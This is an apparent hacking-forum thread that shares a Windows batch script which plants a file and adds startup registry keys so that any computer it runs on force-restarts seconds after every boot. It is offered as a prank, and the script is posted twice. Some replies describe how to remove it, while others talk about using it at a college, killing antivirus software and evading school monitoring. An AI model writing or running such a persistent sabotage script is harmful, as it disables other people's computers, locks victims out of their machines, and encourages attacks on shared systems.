Login Register


Shutdown Computer Every Time It Is Booted Up filter_list
Author
Message
Shutdown Computer Every Time It Is Booted Up #1
Code:
echo @echo off>c:\windows\hartlell.bat echo break off>>c:\windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat echo end>>c:\windows\hartlell.bat reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f echo Undergroundkyng Strikes Again PAUSE

Save as: .bat

Have a FUN! :thumbs:

Reply

RE: Shutdown Computer Every Time It Is Booted Up #2
can you please tell me , after running this program, how to prevent it to auto shutdown again. thank

Reply

RE: Shutdown Computer Every Time It Is Booted Up #3
You would probably have to make a cmd prompt that reverses and does the opposite to what this does. It could be stopped just by deleting it, not too sure though.
[Image: BWMwD.png]

Awesome<3*

Reply

RE: Shutdown Computer Every Time It Is Booted Up #4
looks nice gonna test it..
[Image: arEUm.jpg]
Writing a TUT may take 1 or 2 days,
But adding a +rep or saying thanks takes 1 or 2 minutes.


Reply

RE: Shutdown Computer Every Time It Is Booted Up #5
To get this out you have to go to your registry editor as fast as possible in the start of the computer, and delete the file in the specified registry above.
[Image: nNICR.jpg]
Creds to bluedog

For a list of my contributions (includes tutorials). Click here.

If you'd like to apply for Heat, please click here.

Reply

RE: Shutdown Computer Every Time It Is Booted Up #6
Old school but interesting way.. good share.
I'm Back!(05-16-12) (I miss Sage)

[link=http://goo.gl/NMwwO]Live Hacking CD[/link]

[link=http://goo.gl/ab9Ec]How to: Hack Windows Admin Password[/link]



Reply

RE: Shutdown Computer Every Time It Is Booted Up #7
Aha, making a shutdown batchfile run at startup was my entry into this world of mischief and had alot of fun with it in secondary school.

Another thing that was fun in secondary school was to open a new word doc, enter text, hit shutdown button, then click cancel on word save prompt and this would also stop the shutdown. The best bit was, at that point, it had already killed the teachers monitoring software.

Good share anyway Wink

Reply

RE: Shutdown Computer Every Time It Is Booted Up #8
(07-07-2011, 04:07 PM)DeathEater Wrote: it is a nice share bro.did you include code to kill AV in this program.I want to test it in our college.

No it's not kill av's...I have code for kill av's...

Reply

RE: Shutdown Computer Every Time It Is Booted Up #9
Wait, does this shut down your computer when it your computer starts up? How do you delete it then? Im guessing Safe mode?

Reply

RE: Shutdown Computer Every Time It Is Booted Up #10
(07-12-2011, 05:41 AM)Mastermrz Wrote: Wait, does this shut down your computer when it your computer starts up? How do you delete it then? Im guessing Safe mode?

Yeah every time when is start up batch shtudown the computer...Look at this code:

Code:
echo @echo off>c:\windows\hartlell.bat echo break off>>c:\windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat echo end>>c:\windows\hartlell.bat reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f

try to delete in c:\windows\hartlell.bat

delete hartlell.bat

then delete registry:
hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f

hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f


P.S. Try this batch on virtual machine...not on your computer...

Reply







Users browsing this thread: 1 Guest(s)